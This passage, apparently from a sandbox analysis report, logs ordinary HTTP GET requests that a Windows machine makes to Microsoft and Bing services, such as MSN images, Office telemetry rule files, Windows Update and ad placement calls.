Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msDML.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1732577146765&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a83a3db270ec46f296fce94d1b2a9496&activityId=a83a3db270ec46f296fce94d1b2a9496&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=5D1A4457261E4178B59F6A60663A50BE&MUID=0675AFABBF8562701E27BAE9BE8263C5 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1; SM=T; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639329_16GDTY03HO5SY2UBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239370639330_1D80T5H13WVAODNQ8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381741590_17WQZAEC34EOK6NSA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381741591_1LPZQNFJIC0J01PB0&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dwuDxv8+uh2Eo4S&MD=141vAK7p HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232609Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=bda6a967de654217b56a2bd3808f0fb8&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601508&metered=false&nettype=ethernet&npid=sc-88000045&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601508&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p=Cache-Control: no-cacheMS-CV: coLMDrnC4km7EPw+.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d4db4a4df9bf4405a59081ccfdb0fb26&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=d4db4a4df9bf4405a59081ccfdb0fb26&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-AliveCookie: MUID=2D0FBE660D39698E1D8CAB240C20684C; MR=0
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d4db4a4df9bf4405a59081ccfdb0fb26&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-AliveCookie: MUID=2D0FBE660D39698E1D8CAB240C20684C; MSPTC=E_7Pgxe5IyZnkpNGDVtdCmsLOBanq4xVLEtuzfWeKyI; MR=0
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
